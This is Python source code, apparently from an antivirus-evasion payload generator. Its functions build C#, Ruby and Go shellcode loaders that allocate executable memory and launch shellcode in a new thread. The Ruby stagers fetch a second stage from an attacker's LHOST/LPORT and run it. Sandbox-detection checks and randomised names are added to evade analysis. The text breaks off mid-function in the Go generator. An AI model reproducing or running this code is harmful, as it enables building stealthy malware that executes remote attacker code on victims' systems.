def senecas_games(evasion_payload): # Start checks to determine language # Define original values of variables num_tabs_required = 0 check_code = '' if evasion_payload.language == 'python': if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower( ) != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int( evasion_payload.required_options["EXPIRE_PAYLOAD"][0]))) # Create Payload code check_code += '\t' * num_tabs_required + 'from datetime import datetime\n' check_code += '\t' * num_tabs_required + 'from datetime import date\n' check_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n' check_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n' check_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": rand_hostname = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import platform\n' check_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n' check_code += '\t' * num_tabs_required + 'if \"' + evasion_payload.required_options[ "HOSTNAME"][0].lower( ) + '\" in ' + rand_hostname + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": rand_domain = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import socket\n' check_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n' check_code += '\t' * num_tabs_required + 'if \"' + evasion_payload.required_options[ "DOMAIN"][0].lower() + '\" in ' + rand_domain + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": rand_processor_count = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import multiprocessing\n' check_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n' check_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + evasion_payload.required_options[ "PROCESSORS"][0] + ':\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import getpass\n' check_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n' check_code += '\t' * num_tabs_required + 'if \'' + evasion_payload.required_options[ "USERNAME"][0].lower( ) + '\' in ' + rand_user_name + '.lower():\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'ruby': if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower( ) != "x": year = date.today().year month = date.today().month day = date.today().day # Create Payload code check_code += 'require \'date\'\n' check_code += 'if Date.today < Date.parse(\'' + year + '-' + month + '-' + day + '\').next_day(' + evasion_payload.required_options[ "EXPIRE_PAYLOAD"][0] + ')\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += 'require \'socket\'\n' check_code += 'hostname = Socket.gethostname.downcase\n' check_code += 'if hostname[\"' + evasion_payload.required_options[ "HOSTNAME"][0].lower() + '\"]\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": check_code += 'require \'socket\'\n' check_code += 'domain = Socket.gethostname.downcase\n' check_code += 'if domain[\"' + evasion_payload.required_options[ "DOMAIN"][0].lower() + '\"]\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": check_code += 'name = ENV["USERNAME"].downcase\n' check_code += 'if name[\"' + evasion_payload.required_options[ "USERNAME"][0].lower() + '\"]\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'perl': if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": rand_hostname = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'Use Sys::Hostname;\n' check_code += '\t' * num_tabs_required + 'my $' + rand_hostname + ' = hostname;\n' check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_hostname + '), lc(' + evasion_payload.required_options[ "HOSTNAME"][0] + ')) != -1){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": rand_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'my $' + rand_name + ' = Win32::LoginName;\n' check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_name + '), lc(\"' + evasion_payload.required_options[ "USERNAME"][0] + '\")) != -1){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": rand_domain = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'use Net::Domain qw (hostdomain);\n' check_code += '\t' * num_tabs_required + 'my $' + rand_domain + ' = hostdomain();\n' check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_domain + '), lc(\"' + evasion_payload.required_options[ "DOMAIN"][0] + '\")) != -1){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": rand_corecount = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'my $' + rand_corecount + ' = $ENV{\"NUMBER_OF_PROCESSORS\"};' check_code += '\t' * num_tabs_required + 'if ($' + rand_corecount + ' >= ' + evasion_payload.required_options[ "PROCESSORS"][0] + '){\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'powershell': if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += "if($env:computername -eq \"" + evasion_payload.required_options[ "HOSTNAME"][0].lower() + "\") {\n" num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": check_code += "if((Get-WMIObject -Class Win32_ComputerSystem).Domain -eq \"" + evasion_payload.required_options[ "DOMAIN"][0].lower() + "\") {\n" num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": check_code += "if($env:username -eq \"" + evasion_payload.required_options[ "USERNAME"][0].lower() + "\") {\n" num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": check_code += "if((Get-WMIObject -Class Win32_Processor).NumberOfLogicalProcessors -ge " + evasion_payload.required_options[ "PROCESSORS"][0].lower() + ") {\n" num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'cs': if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower( ) != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() # Create Payload code check_code += '\t' * num_tabs_required + 'DateTime {} = DateTime.Today;\n'.format( RandToday) check_code += '\t' * num_tabs_required + 'DateTime {} = {}.AddDays({});\n'.format( RandExpire, RandToday, evasion_payload.required_options["EXPIRE_PAYLOAD"][0]) check_code += '\t' * num_tabs_required + 'if ({} < {}) {{\n'.format( RandExpire, RandToday) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format( evasion_payload.required_options["HOSTNAME"][0].lower()) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'if (System.Environment.ProcessorCount > {}) {{\n'.format( evasion_payload.required_options["PROCESSORS"][0]) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() rand_char_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format( rand_user_name) check_code += '\t' * num_tabs_required + "string[] {} = {}.Split('\\\\');\n".format( rand_char_name, rand_user_name) check_code += '\t' * num_tabs_required + 'if ({}[1].Contains("{}")) {{\n\n'.format( rand_char_name, evasion_payload.required_options["USERNAME"][0]) # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'go': rand_username = evasion_helpers.randomString() rand_error1 = evasion_helpers.randomString() rand_hostname = evasion_helpers.randomString() rand_error2 = evasion_helpers.randomString() rand_processor = evasion_helpers.randomString() rand_domain = evasion_helpers.randomString() if evasion_payload.required_options["USERNAME"][0].lower() != "x": check_code += rand_username + ", " + rand_error1 + " := user.Current()\n" check_code += "if " + rand_error1 + " != nil {\n" check_code += "os.Exit(1)}\n" check_code += "if strings.Contains(strings.ToLower(" + rand_username + ".Username), strings.ToLower(\"" + evasion_payload.required_options[ "USERNAME"][0] + "\")) {\n" num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += rand_hostname + ", " + rand_error2 + " := os.Hostname()\n" check_code += "if " + rand_error2 + " != nil {\n" check_code += "os.Exit(1)}\n" check_code += "if strings.Contains(strings.ToLower(" + rand_hostname + "), strings.ToLower(\"" + evasion_payload.required_options[ "HOSTNAME"][0] + "\")) {\n" num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": check_code += rand_processor + " := runtime.NumCPU()\n" check_code += "if " + rand_processor + " >= " + evasion_payload.required_options[ "PROCESSORS"][0] + " {\n" num_tabs_required += 1 # Return check information return check_code, num_tabs_required else: return '', 0
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:]) # randomize all our variable names, yo' namespaceName = evasion_helpers.randomString() className = evasion_helpers.randomString() bytearrayName = evasion_helpers.randomString() funcAddrName = evasion_helpers.randomString() hThreadName = evasion_helpers.randomString() threadIdName = evasion_helpers.randomString() pinfoName = evasion_helpers.randomString() num_tabs_required = 0 # get 12 random variables for the API imports r = [evasion_helpers.randomString() for x in range(12)] y = [evasion_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n" payload_code += "namespace %s { class %s {\n" % (namespaceName, className) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) payload_code += "static void Main() {\n" num_tabs_required += 2 if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() # Create Payload code payload_code += '\t' * num_tabs_required + 'DateTime {} = DateTime.Today;\n'.format( RandToday) payload_code += '\t' * num_tabs_required + 'DateTime {} = {}.AddDays({});\n'.format( RandExpire, RandToday, self.required_options["EXPIRE_PAYLOAD"][0]) payload_code += '\t' * num_tabs_required + 'if ({} < {}) {{\n'.format( RandExpire, RandToday) # Add a tab for this check num_tabs_required += 1 if self.required_options["HOSTNAME"][0].lower() != "x": payload_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format( self.required_options["HOSTNAME"][0].lower()) # Add a tab for this check num_tabs_required += 1 if self.required_options["DOMAIN"][0].lower() != "x": payload_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["PROCESSORS"][0].lower() != "x": payload_code += '\t' * num_tabs_required + 'if (System.Environment.ProcessorCount > {}) {{\n'.format( self.required_options["PROCESSORS"][0]) # Add a tab for this check num_tabs_required += 1 if self.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() rand_char_name = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format( rand_user_name) payload_code += '\t' * num_tabs_required + "string[] {} = {}.Split('\\\\');\n".format( rand_char_name, rand_user_name) payload_code += '\t' * num_tabs_required + 'if ({}[1].Contains("{}")) {{\n\n'.format( rand_char_name, self.required_options["USERNAME"][0]) # Add a tab for this check num_tabs_required += 1 if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "byte[] %s = {%s};" % (bytearrayName, Shellcode) payload_code += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, bytearrayName) payload_code += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( bytearrayName, funcAddrName, bytearrayName) payload_code += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % ( hThreadName, threadIdName, pinfoName) payload_code += "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % ( hThreadName) # payload_code += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": rand_heap = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_var = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};\n" % ( bytearrayName, Shellcode) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( rand_heap, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( rand_ptr, rand_heap, bytearrayName) payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( rand_ptr, bytearrayName, bytearrayName) payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format( rand_var) payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, rand_ptr, rand_var) payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format( hThreadName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return
def generate(self): # How I'm tracking the number of nested tabs needed # to make the payload num_ends_required = 0 payload_code = '' payload_code += "require 'rubygems';require 'win32/api';require 'socket';include Win32\n" # Add logic for adding this line, stupid bug and I have no idea # why this is even a problem, but ruby is dumb if self.required_options["EXPIRE_PAYLOAD"][0] != "X" or self.required_options["HOSTNAME"][0] != "X" or self.required_options["DOMAIN"][0] != "X" or self.required_options["USERNAME"][0] != "X": pass else: payload_code += "exit if Object.const_defined?(:Ocra)\n" if self.required_options["HOSTNAME"][0] != "X" or self.required_options["DOMAIN"][0] != "X": payload_code += 'require \'socket\'\n' if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": year = date.today().year month = date.today().month day = date.today().day # Create Payload code payload_code += 'require \'date\'\n' payload_code += 'if Date.today < Date.parse(\'' + year + '-' + month + '-' + day + '\').next_day(' + self.required_options["EXPIRE_PAYLOAD"][0] + ')\n' # Add a tab for this check num_ends_required += 1 if self.required_options["HOSTNAME"][0].lower() != "x": payload_code += 'hostname = Socket.gethostname.downcase\n' payload_code += 'if hostname[\"' + self.required_options["HOSTNAME"][0].lower() + '\"]\n' # Add a tab for this check num_ends_required += 1 if self.required_options["DOMAIN"][0].lower() != "x": payload_code += 'domain = Socket.gethostname.downcase\n' payload_code += 'if domain[\"' + self.required_options["DOMAIN"][0].lower() + '\"]\n' # Add a tab for this check num_ends_required += 1 if self.required_options["USERNAME"][0].lower() != "x": payload_code += 'name = ENV["USERNAME"].downcase\n' payload_code += 'if name[\"' + self.required_options["USERNAME"][0].lower() + '\"]\n' # Add a tab for this check num_ends_required += 1 # randomly generate out variable names payloadName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() threadName = evasion_helpers.randomString() valloc_random = evasion_helpers.randomString() rtlmove_random = evasion_helpers.randomString() createthread_random = evasion_helpers.randomString() waitfor_random = evasion_helpers.randomString() heapcreate_random = evasion_helpers.randomString() heapalloc_random = evasion_helpers.randomString() heap_name = evasion_helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "$" + valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "$" + heapcreate_random + " = API.new('HeapCreate', 'III', 'I');$" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" payload_code += "$g_o = API.new('_get_osfhandle', 'I', 'I', 'msvcrt.dll')\n" payload_code += "def g(ip,port)\n" payload_code += "\tbegin\n" payload_code += "\t\ts = TCPSocket.open(ip, port)\n" payload_code += "\t\tpl = Integer(s.recv(4).unpack('L')[0])\n" payload_code += "\t\tp = \" \"\n" payload_code += "\t\twhile p.length < pl\n\t\tp += s.recv(pl) end\n" payload_code += "\t\tp[0] = ['BF'].pack(\"H*\")\n" payload_code += "\t\tsd = $g_o.call(s.fileno)\n" payload_code += "\t\tfor i in 1..4\n\t\t\tp[i] = Array(sd).pack('V')[i-1] end\n" payload_code += "\t\treturn p\n" payload_code += "\trescue\n\treturn \"\"\n\tend\nend\n" payload_code += "def ij(sc)\n" payload_code += "\tif sc.length > 1000\n" if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "\t\tpt = $" + valloc_random + ".call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n" payload_code += "\t\tx = $" + rtlmove_random + ".call(pt,sc,sc.length)\n" payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,pt,0,0,0),0xFFFFFFF)\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "\t\t$" + heap_name + " = $" + heapcreate_random + ".call(0x0004,(sc.length > 0x1000 ? sc.length : 0x1000), 0)\n" payload_code += "\t\t$" + ptrName + " = $" + heapalloc_random + ".call($" + heap_name + ", 0x00000008, sc.length)\n" payload_code += "\t\tx = $" + rtlmove_random + ".call($" + ptrName + ",sc,sc.length)\n" payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,$" + ptrName + ",0,0,0),0xFFFFFFF)\n" payload_code += "\tend\nend\n" payload_code += "ij(g(\"%s\",%s))" % (self.required_options["LHOST"][0], self.required_options["LPORT"][0]) # Close out all the if statements for iteration in range(num_ends_required): payload_code += 'end\n' self.payload_source_code = payload_code return
def generate(self): payload_code = "require 'rubygems';require 'win32/api';require 'socket';include Win32\n" # Add logic for adding this line, stupid bug and I have no idea # why this is even a problem, but ruby is dumb if self.required_options["HOSTNAME"][0] != "X" or self.required_options[ "DOMAIN"][0] != "X" or self.required_options["USERNAME"][ 0] != "X" or self.required_options["SLEEP"][0] != "X": pass else: payload_code += "exit if Object.const_defined?(:Ocra)\n" if self.required_options["HOSTNAME"][ 0] != "X" or self.required_options["DOMAIN"][0] != "X": payload_code += 'require \'socket\'\n' payload_code2, num_ends_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # randomly generate out variable names payloadName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() threadName = evasion_helpers.randomString() valloc_random = evasion_helpers.randomString() rtlmove_random = evasion_helpers.randomString() createthread_random = evasion_helpers.randomString() waitfor_random = evasion_helpers.randomString() heapcreate_random = evasion_helpers.randomString() heapalloc_random = evasion_helpers.randomString() heap_name = evasion_helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "$" + valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "$" + heapcreate_random + " = API.new('HeapCreate', 'III', 'I');$" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" payload_code += "$g_o = API.new('_get_osfhandle', 'I', 'I', 'msvcrt.dll')\n" payload_code += "def g(ip,port)\n" payload_code += "\tbegin\n" payload_code += "\t\ts = TCPSocket.open(ip, port)\n" payload_code += "\t\tpl = Integer(s.recv(4).unpack('L')[0])\n" payload_code += "\t\tp = \" \"\n" payload_code += "\t\twhile p.length < pl\n\t\tp += s.recv(pl) end\n" payload_code += "\t\tp[0] = ['BF'].pack(\"H*\")\n" payload_code += "\t\tsd = $g_o.call(s.fileno)\n" payload_code += "\t\tfor i in 1..4\n\t\t\tp[i] = Array(sd).pack('V')[i-1] end\n" payload_code += "\t\treturn p\n" payload_code += "\trescue\n\treturn \"\"\n\tend\nend\n" payload_code += "def ij(sc)\n" payload_code += "\tif sc.length > 1000\n" if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "\t\tpt = $" + valloc_random + ".call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n" payload_code += "\t\tx = $" + rtlmove_random + ".call(pt,sc,sc.length)\n" payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,pt,0,0,0),0xFFFFFFF)\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "\t\t$" + heap_name + " = $" + heapcreate_random + ".call(0x0004,(sc.length > 0x1000 ? sc.length : 0x1000), 0)\n" payload_code += "\t\t$" + ptrName + " = $" + heapalloc_random + ".call($" + heap_name + ", 0x00000008, sc.length)\n" payload_code += "\t\tx = $" + rtlmove_random + ".call($" + ptrName + ",sc,sc.length)\n" payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,$" + ptrName + ",0,0,0),0xFFFFFFF)\n" payload_code += "\tend\nend\n" payload_code += "ij(g(\"%s\",%s))\n" % ( self.required_options["LHOST"][0], self.required_options["LPORT"][0]) # Close out all the if statements for iteration in range(num_ends_required): payload_code += 'end\n' self.payload_source_code = payload_code return
def generate(self): # How I'm tracking the number of nested tabs needed # to make the payload num_ends_required = 0 payload_code = '' # randomly generate out variable names payloadName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() threadName = evasion_helpers.randomString() heap_name = evasion_helpers.randomString() payload_code = "require 'rubygems'\n" payload_code += "require 'win32/api'\n" payload_code += "include Win32\n" # Add logic for adding this line, stupid bug and I have no idea # why this is even a problem, but ruby is dumb if self.required_options["HOSTNAME"][0] != "X" or self.required_options[ "DOMAIN"][0] != "X" or self.required_options["USERNAME"][ 0] != "X" or self.required_options["SLEEP"][0] != "X": pass else: payload_code += "exit if Object.const_defined?(:Ocra)\n" # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # Base64 Encode Shellcode Shellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') payload_code2, num_ends_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # randomly generate out variable names payloadName = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() valloc_random = evasion_helpers.randomString() heap_name = evasion_helpers.randomString() heapcreate_random = evasion_helpers.randomString() heapalloc_random = evasion_helpers.randomString() rtlmove_random = evasion_helpers.randomString() createthread_random = evasion_helpers.randomString() waitfor_random = evasion_helpers.randomString() payload_code += "require 'base64'\n" if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" payload_code += payloadName + " = [\"" + Shellcode + "\".unpack(\"m\")[0].delete(\"\\\\\\\\x\")].pack(\"H*\")\n" payload_code += ptrName + " = " + valloc_random + ".call(0,(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0x1000, 0x40)\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += heapcreate_random + " = API.new('HeapCreate', 'III', 'I');" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" payload_code += payloadName + " = [\"" + Shellcode + "\".unpack(\"m\")[0].delete(\"\\\\\\\\x\")].pack(\"H*\")\n" payload_code += heap_name + " = " + heapcreate_random + ".call(0x0004,(" + payloadName + ".length > 0x1000 ? " + payloadName + ".length : 0x1000), 0)\n" payload_code += ptrName + " = " + heapalloc_random + ".call(" + heap_name + ", 0x00000008, " + payloadName + ".length)\n" payload_code += "x = " + rtlmove_random + ".call(" + ptrName + "," + payloadName + "," + payloadName + ".length); " + threadName + " = " + createthread_random + ".call(0,0," + ptrName + ",0,0,0); x = " + waitfor_random + ".call(" + threadName + ",0xFFFFFFF)\n" # Close out all the if statements for iteration in range(num_ends_required): payload_code += 'end\n' self.payload_source_code = payload_code return
def generate(self): memCommit = evasion_helpers.randomString() memReserve = evasion_helpers.randomString() pageExecRW = evasion_helpers.randomString() kernel32 = evasion_helpers.randomString() procVirtualAlloc = evasion_helpers.randomString() size = evasion_helpers.randomString() err = evasion_helpers.randomString() wsadata = evasion_helpers.randomString() socket = evasion_helpers.randomString() socketAddr = evasion_helpers.randomString() ip = self.required_options["LHOST"][0].split('.') buf = evasion_helpers.randomString() dataBuf = evasion_helpers.randomString() flags = evasion_helpers.randomString() qty = evasion_helpers.randomString() scLength = evasion_helpers.randomString() sc = evasion_helpers.randomString() sc2 = evasion_helpers.randomString() total = evasion_helpers.randomString() mem = evasion_helpers.randomString() buffer_variable = evasion_helpers.randomString() handle = evasion_helpers.randomString() x = evasion_helpers.randomString() value = evasion_helpers.randomString() cust_func = evasion_helpers.randomString() heapcreatevariable = evasion_helpers.randomString() heapallocvariable = evasion_helpers.randomString() heapcreateout = evasion_helpers.randomString() allocvarout = evasion_helpers.randomString() errorvariable = evasion_helpers.randomString() errorvariabledos = evasion_helpers.randomString() constSize = evasion_helpers.randomString() # sandbox check code sandbox_checks, num_curlys = gamemaker.senecas_games(self) payload_code = "package main\nimport (\n\"encoding/binary\"\n\"syscall\"\n\"unsafe\"\n" if self.required_options["PROCESSORS"][0].lower() != "x": payload_code += "\"runtime\"\n" # Add in other imports based on checks being performed if self.required_options["USERNAME"][0].lower() != "x": payload_code += "\"strings\"\n\"os/user\"\n" if self.required_options["HOSTNAME"][0].lower( ) != "x" or self.required_options["PROCCHECK"][0].lower() != 'false': if "strings" not in payload_code: payload_code += "\"strings\"\n" if self.required_options["SLEEP"][0].lower() != "x": payload_code += "\"net\"\n\"time\"\n\"encoding/binary\"\n" if self.required_options["BADMACS"][0].lower() != 'false': if "net" not in payload_code: payload_code += "\"net\"\n" if "strings" not in payload_code: payload_code += "\"strings\"\n" if self.required_options["UTCCHECK"][0].lower() != 'false': if "time" not in payload_code: payload_code += "\"time\"\n" if self.required_options["CURSORCHECK"][0].lower() != 'false': if "time" not in payload_code: payload_code += "\"time\"\n" payload_code += ")\n" payload_code += "const (\n" payload_code += "%s = 0x1000\n" % (memCommit) payload_code += "%s = 